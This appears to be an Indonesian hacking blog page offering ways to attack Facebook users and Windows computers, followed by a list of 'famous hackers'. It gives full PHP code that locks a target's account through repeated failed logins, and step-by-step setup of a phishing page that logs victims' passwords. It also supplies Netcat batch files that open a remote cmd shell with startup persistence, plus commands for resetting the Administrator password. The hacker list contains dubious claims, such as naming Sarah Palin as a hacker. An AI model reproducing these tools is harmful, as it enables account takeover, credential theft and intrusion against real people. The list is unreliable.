http://www.ziddu.com/download/4304840/GroundZerosFacebookFreezer.rar.html

atau

http://www.ziddu.com/download/4365858/GroundZerosFacebookFreezer.exe.html

caranya, buka applikasinya, lalu ketikkan email yang di gunakan sebagai akun facebook, trus klik 'freeze'

facebook,freezer,facebook freezer,account facebook
tunggu sebentar

Tool ini memerlukan koneksi internet, jadi anda jangan lupa koneksikan ke internet.

selesai! untuk sementara akun tersebut di freeze

facebook,hacking


Cara men-enable kembali akun yg udah di freeze, klik tulisan "reset your password here"

account freeze,facebookTapi jika anda ingin menggunakan versi yang lebih aman, lebih bebas virus, tapi lebih ribet dan susah, maka saya juga akan mengajarkan cara membuat applikasi freeze, yang fungsinya sama persis dengan softwere freeze, yaitu bikin beku atau tidak bisa buat login facebook seseorang , tapi ini versi web php, jadi yang harus anda siapkan adalah :

hosting yang support php dan curl (jangan 000webhost)
dan Notepad :D
caranya mudah, copy script dibawah ini ke notepad :

<?
echo "<html><title>PHP Facebook Freezer</title><head><meta http-equiv=\"refresh\" content=\"600\"></head><body>";
echo "<br><form method=post>Email : <input name=email><input type=submit value=Submit></form><br><br>";
$email=$_POST['email'];
$passwd='123';
if(isset($email) && isset($passwd)){
$kue="/tmp/".rand().".txt";
$url='https://login.facebook.com/login.php';
$login="email=$email&pass=$passwd&login=Log In";
define("_COK_", $kue);
curlget($url);
for ($number=1; $number<=30; $number++) {
$data=curlpost($url,$login);
}
echo $data;
}
function curlget($url){
$agent=$_SERVER['HTTP_USER_AGENT'];
$curl=curl_init();
curl_setopt($curl, CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_USERAGENT, $agent);
curl_setopt($curl, CURLOPT_RETURNTRANSFER ,1);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION ,1);
curl_setopt($curl, CURLOPT_ENCODING, "");
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_COOKIEFILE, _COK_);
curl_setopt($curl, CURLOPT_COOKIEJAR, _COK_);
$data = curl_exec($curl);
curl_close ($curl);
return $data;
}
function curlpost($url,$post){
$agent=$_SERVER['HTTP_USER_AGENT'];
$curl=curl_init();
curl_setopt($curl, CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_USERAGENT, $agent);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
curl_setopt($curl, CURLOPT_ENCODING, "");
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION ,1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER ,1);
curl_setopt($curl, CURLOPT_COOKIEFILE, _COK_);
curl_setopt($curl, CURLOPT_COOKIEJAR, _COK_);
$data = curl_exec($curl);
curl_close ($curl);
return $data;
}
echo "</body></html>";
?>

setelah kamu berhasil mengkopi script untuk hack facebook diatas , kini saatnya untuk menyimpan dengan nama nomoredisk.Php
setelah itu kamu upload file Fb.Php ke hostinganmu yang suport curl dan php
nih contoh jadinya klik disini
jika file sudah di upload kini tinggal digunakan saja,
buka file yang kamu upload tadi ex: http://wolimierz.org/images/nomoredisk.php
setelah itu masukan email target, maka dia tidak akan bisa login (tapi tidak permanent)

2. Dengan cara Fake Login,

Kalau belum tahu apa itu Fake Login, silahkan klik link dibawah ini,


Pasti anda melihat sebuah situs login facebook, persis dengan yang aslinya, hanya alamatnya saja yang berbeda. Inilah yang disebut dengan Fake Login, dari sini kita akan mencuri akun orang lain.

Jika anda ingin mencoba cara tersebut, caranya anda tinggal mengikuti petunjuk berikut.

Pertama : Silahkan download filenya di sini.

Kedua : Extract semua file yang ada didalamnya, kemudian file yang telah di extract kita upload ke layanan hosting file, jika anda bingung, silahkan anda upload di layanan kesayangan saya di http://fileave.com lalu anda sign up, kemudian tinggal mengupload file yang tadi di extract.

Terdapat 3 file tersebut yaitu :

- index.html
- logs.php
- logs.txt

Yang perlu di ingat adalah pada file index.html, edit pada bagian alamat hostingan.
Caranya : Rename/ganti format file Index.html menjadi Index.txt...
kemudian anda tekan CTRL+F lalu cari tulisan http://hostinganlo.com/logs.php ganti tulisan http//hostinganlo.com dengan alamat tempat anda menghosting direktori " facebook", misalkan menjadi http://IcHiNx.fileave.com/logs.html jika sudah jangan lupa untuk menyimpannya.
Setelah itu file index.txt tadi di rename/ganti format lagi menjadi index.html kemudian di upload.

Ketiga : Jika sudah anda upload semua file tadi, sekarang tinggal anda coba dengan cara klik file Index.html (misalkan klo punya saya : http://IcHiNx.fileave.com/logs.html).

Keempat : Setelah selesai langkah diatas, sekarang anda tinggal cari korban. Caranya, anda harus suruh orang lain atau anda sendirilah login ke facebook dengan ramuan yang telah anda buat tadi.

Kalau sudah, nanti anda tinggal melihat account plus passwordnya di Logs.txt

Demikian cara yang digunakan para hacker dalam melancarkan aksinya. Dengan membaca tulisan ini, mudah-mudahan para pembaca dapat menghindari permasalahan sejenis, sehingga keamanan akun anda tidak menjadi mainan para hacker.

Jadi saran yang bisa saya sampaikan adalah :

1. Jangan pernah menunjukan email anda di profile Facebook.
2. Jangan samakan password email anda dengan password akun lain.
3. Jangan menggunakan data diri sebagai password, seperti misalnya menggunakan tanggal lahir, tempat lahir, dll.
4. Jangan sembarangan mengaprove friend request yang anda tidak kenal.
5. Jika anda tiba-tiba di hadapkan dengan situs login facebook, hati-hati, anda jangan langsung mengisi email dan password, cek dulu alamatnya, apa benar halaman tersebut berasal dari facebook.com

Penulis tidak melakukan kerusakan pada akun siapapun, karena penulis hanya melihat dari sisi keamanan, dan tidak menyarankan penyerangan ke akun siapapun.

Semoga dengan mempelajari kelemahan yang ada ini, bisa membuat kita, pemilik akun di " Facebook " semakin waspada dalam mengamankan dirinya terhadap serangan dari para hacker yang bisa terjadi setiap detik.

Hacking a Network Computer

Saya menulis ini karena benar-benar bekerja untuk saya beberapa kali dan saya harap hal ini untuk Anda juga, semua yang Anda butuhkan adalah sasaran yang sangat yang mudah ditipu.

Seperti yang kita semua tahu, sebuah Trojan sangat mungkin akan dijemput oleh AV, apa yang Anda butuhkan adalah Netcat, netcat akan membuka port pada komputer untuk mengakses (Jika digunakan dengan benar oleh sebuah file batch, Anda akan membuka port pada komputer target). The batch file untuk menyalin netcat pada remote computer harus dijalankan dari komputer target (Target harus mengeksekusi file batch dengan cara tertentu). Buka Notepad dan ketik ini:
Code: Kode:
@echo off

cd\
xcopy \\IPAnda\shared folder\netcat.exe
copy \\IPAnda\shared folder\netcat.exe (Hanya untuk memastikan)
cd "Documents and Settings"
cd "All Users"
cd "Start Menu"
cd Programs cd Startup
xcopy \\IPAnda\shared folder\Startup.bat (Ini adalah file batch lain yang Anda akan tulis)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Simpan file sebagai file batch dengan menggunakan Notepad.

File batch berikutnya akan digunakan untuk memastikan port yang Anda berikan akan membuka windows setiap kali dijalankan, Anda dapat menentukan semua port yang Anda inginkan. Buka Notepad dan ketik:
Code: Kode:
 @echo off

cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Simpan file sebagai file batch dengan menggunakan Notepad, ini akan menjadi file yang disalin ke folder startup di file batch sebelumnya yang kita tulis. Anda dapat menyatukan batch file untuk file lain dan memberikan file, membiarkan target mengeksekusi file tersebut sehingga ia dapat menyalin netcat dan file batch yang lain ke komputer miliknya sehingga membuka port 9.999, setelah port 9.999 telah terbuka maka Anda dapat menggunakan telnet dan telnet ke port pada komputer target untuk memiliki akses penuh tanpa perlu mengetikkan password. Setelah Anda berada dalam pengubah password Administrator dan jika sesuatu terjadi pada file Anda, perintahnya adalah:

net user Administrator Newpassword

Sekarang dari sini Anda bisa melakukan apa yang Anda inginkan, misalnya mencoba mematikan komputer target dengan browsing ke folder system32 dan kemudian ketik:

shutdown-r-t 10-c "Hello"

komputer kemudian akan restart dalam waktu 10 detik. Anda bahkan dapat bermain-main lagi dengan Instalasi Cain & Abel pada komputer Anda dan kemudian menginstal Abel remotely di komputernya (Sejak Anda tahu password Administrator) Segera sesudah Anda menginstal Abel pada target, Anda dapat memulai dan memberhentikan layanan dan Anda dapat melakukan lebih banyak lagi!

Selamat Menikmati.

Hacker Hacker Dunia

Dibawah ini adalah foto dari hacker-hacker yang terkenal di dunia, apakah anda termasuk dalam daftar dibawah ini.?



1. Joe Desch

Joe Desch mengepalai program yang super rahasia di National Cash Register Co. Dayton. Yang nantinya program tersebut dapat digunakan oleh USA untuk memecahkan kode rahasianya NAZI. Nama Program tersebut Bombe.


2. Shambhu Upadhyaya

Shambhu Upadhyaya adalah kepala penelitian dari Center of Excellence in Information Systems Assurance Research and Education at the State University of New York at Buffalo. Dia adalah hacker yang direkrut karena keahliannya.


3. Robert Lipka

Ditangkap ama FBI Hari jum’at tanggal Feb. 23, 1996 atas tuduhan mata2 untuk Uni Soviet pada tahun 1960-an. Dia dulu kerja di National Security Agency dari tahun 1964 sampai 1967.


4. Jerome Heckenkamp

Photo ini diambil sewaktu dia habis keluar dari gedung Federal di Albuquerque. Dia dituduh hacking atas 6 perusahaan website.


5. James S. Green II

James S. Green II waktu dipoto ini berumur 35 tahun. Mantan kepala keamanan di General Motor (GM). Dia dituduh hacking atas nomor jaminan sosial dari pegawai GM lalu menghack data2 pegawai yang ada di GM.


6. Sarah Palin

Dituduh hacking atas komputernya Randy Ruedrich (Politikus Alaska). Niatnya cuma pengen nyari bukti atas politikus tersebut atas keterlibatanya dalam tindakan melawan hukum sewaktu politikus tersebut menjadi anggota Alaska Oil & Gas Conservation Commission.


7. Robert Morris Jr

Dituduh atas penyebaran Virus Komputer sewaktu dia masih mahasiswa di Cornell University.


8. Dmitry Sklyarov

Umurnya sewaktu di photo 27 tahun. Programmer ini dituduh atas pelanggaran hak cipta atas program di peruhaan Adobe System Inc.


9. Jonathan James

Sewaktu di photo umurnya 16 tahun. Dan dengan umurnya segitu dia udah berani hack PENTAGON dan NASA !!! dia mencuri 13 data komputer dari NASA yang salah satu diantaranya adalah program atas stasiun luar angkasa NASA. Dia biasa dikenal di dunia maya sebagai cOmrade.


10. Onel A. de Guzman

Dia orang Pilipina. Kepemilikan Virus “Love Bug” yang disebarin lewat e-mail, nah ini dia orangnya.


11. Deborah Frincke

Profesor di Bidang IT di University of Idaho, Lewiston, Idaho. Dia bekerja untuk menangkal hacker2 yang bandel.


12. Dennis Moran

Dipenjara dengan tuduhan hacking atas situs Angkatan Udara punya USA. Dia dipenjara selama 9 bulan. Lucunya.. selagi dipenjara, dia disuruh sama Kepala sipirnya buat program komputer untuk kepentingan penjara tersebut. Di Dunia maya dia biasa dikenal dengan “Coolio”.


13. Richard Eaton

Presiden Direktur dari perusahaan WinWhatWhere. Yaitu suatu perusahaan program komputer yang bisa menyelinap kekomputer para hacker tanpa diketahui. Dia biasa bekerja sama dengan FBI.


14. “Mafiaboy”

Dituduh atas hacking situs CNN dan 66 tuduhan hacking atas situs2 besar. Dia ditangkap di Montreal, Canada.


15. Jon Lech Johansen

Umurnya baru 19 Tahun. Dia orang Norwegia. pencipta program DeCSS. yaitu suatu program yang bisa mengcopy DVD meskipun DVD tersebut sudah di protect.


16. Kevin Poulsen

Diphoto tanggal 8 September 1990. Dituduh atas tindakan mata2 untuk hacking FBI dan Keamanan Nasional Amerika.


17. Kevin Mitnick

Diphoto tanggal 21 Januari 2000. Dia biasa Phone Preaking, dan dituduh atas pencurian software di Digital Equipment Corporation’s computer network (Sumber: Threadnya Kiddiez dengan sedikit informasi tambahan dari wilkipedia).


18. Lance Spitzner

Pencipta dari the Honeynet Project. Diphoto ini tanggal 19 Juli 2001. Dibelakangnya adalah laboratoriumnya (ada 8 komputer yang On line semuanya) untuk belajar bagaimana caranya menembus suatu jaringan komputer. Kalau kalian pernah denger Blackhat Hacker Community, dia nih orangnya.


19. Billy Hoffman

Mahasiswa TI Asal Georgia, dituduh hack sistem yang bisa digunakan dengan kartu debit yang biasa digunakan di Georgia Tech University.


20. Michael Haephrati (Kiri), Ruth Brier-Haephrati (kanan)

Sepasang suami istri hacker, ditangkap di Inggris, mereka juga dicari2 sama orang Israel atas tuduhanya hacking Komputer orang Israel dengan menggunakan Trojan Horse.


21. Pierre Kroma

Konsultan kemanan komputer, foto ini diambil sewaktu Live Hacking pada acara pameran komputer terbesar di Hannover, Jerman 10 Maret 2005. Sekitar 6200 exhibitors dari lebih dari 70 negara berkumpul disini.


22. Zamboni

Analis dari sistem keamanan komputer. Dia adalah hacker yang direkrut karena keahliannya.



23. Mudge

Hacker yang sedang bersaksi atas perbuatanya, hacking yang bisa membuat jaringan internet diseluruh dunia tidak bekerja hanya dengan hitungan 30 menit.


24. Tsutomu Shimomura

Dia bekerjasama dengan Federal USA untuk menangkap Mitnick yang berusaha menembus komputernya Shimomura.


25. David L. Smith

Asal New Jerses USA, 30 Tahun… Dia pencipta virus lewat e-mail. Virusnya bernama Melissa.


26. Chen Ing-hau

Pencipta virus Chernobyl, sedang membuat antivirus untuk virus tersebut.


27. Richard Pryce

Dia berhasil menembus sistem kemanan US Air Force dan Lockheed missile systems yang berbasis di USA.


28. Eric O. Jenott

Dituduh sebagai mata2. Dia berhasil menembus sistem keamanan komputer departemen pertahanan USA, lalu menjual Informasinya ke China.



29. Ehud Tenebaum aka “The Analyzer”

Ditangkep deket Tel Aviv oleh polisi anti hacker Israel. Nih orang berhasil nembus sistem keamanan milik FBI. Ini preview hasil kerjanya :



30. Gary McKinnon

Umurnya 40 Tahun. Mungkin ini hacker Nomor 1 di dunia. Dia dituduh telah melakukan hacking terbesar dan terbanyak yang dilakukan kepada Jaringan komputer Pemerintahan di USA, tidak kurang dari 97 komputer (Diantaranya adalah US Army, US Air Force, NASA,) sudah pernah dimasuki sama Mc Kinnon. Merugikan sekitar US$700.000. photo diambil di Pengadilan negeri di London, 10 Mei 2006.

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More